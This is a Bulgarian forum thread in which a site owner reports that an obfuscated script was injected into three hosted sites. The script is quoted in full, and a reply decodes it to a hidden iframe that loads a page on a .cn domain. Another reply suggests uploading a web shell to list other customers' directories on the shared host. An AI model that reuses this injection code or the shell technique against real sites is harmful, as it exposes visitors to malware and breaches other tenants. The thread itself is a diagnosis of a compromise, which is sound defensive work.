Хакнати сайтове или нещо друго...?

Attacker

Attacker

Well-Known Member
Здравейте! Имам 3 хоствани домейна от hosthelpers.com. Браузърът ми е Google Chrome и днес, когато влязох в сайтовете, и на трите ми излезе тази грешка:
http://prikachi.com/files/1107715w.jpg
Никъде в скрипта ми не присъства сайта "ncccnnnc.cn". Видях изходния код на страницата и ето какъв чужд джаваскрипт видях преди края на body тага:
HTML: 
<span id="hTF"></span><script>/*Warning: Opera Only*/var jBn = document.createElement("script");jBn.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("hTF").appendChild(jBn)</script>
Въпросът ми е какво прави този джаваскрипт и хакнати ли са ми сайтовете в действителност?
 
От: Хакнати сайтове или нещо друго...?

да не са ти с пиратски скриптове сайтовете?
 
От: Хакнати сайтове или нещо друго...?

Не, всеки ред е съм си го писал ръчно, няма нищо чуждо.
Едит: Написах част от кода в търсачката и намерих 1 сайт, в който някакъв човек се оплакваше от същото. Беше дал линк към страницата. Чрез whois видях, че и неговия сайт е на същия хостинг, значи хостинга е бил хакнат. Явно трябва да се местя на друг хостинг.
 
Последно редактирано:
От: Хакнати сайтове или нещо друго...?

Не каза най-интересното: кой е хостинга?
 
От: Хакнати сайтове или нещо друго...?

Attacker каза:
Никъде в скрипта ми не присъства сайта "ncccnnnc.cn".
Увеличете...

Присъства, но е кодирано.

Това:
Код: 
%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e

След декодиране е това:
Код: 
<iframe src='http://ncccnnnc.cn/img/index.php' style='display:none;'></iframe>
 
От: Хакнати сайтове или нещо друго...?

Тия за сефте ги чувам.
Я кажи имат ли open_basedir активиран и CPanel ли ползват?
И я направо сложи един shell и пробвай да list-неш някоя /home/<user>/public_html директория. Това е дупка при много хостинги.
 
От: Хакнати сайтове или нещо друго...?

Ами те тия са безплатен хостинг, та може би затова им е по-слаба защитата. Сега са затворили сайтовете на клиентите си и пише, че се опитват да се справят с проблема.
 
Трябва да си влезнал или регистриран, за да отговориш тук.

Горе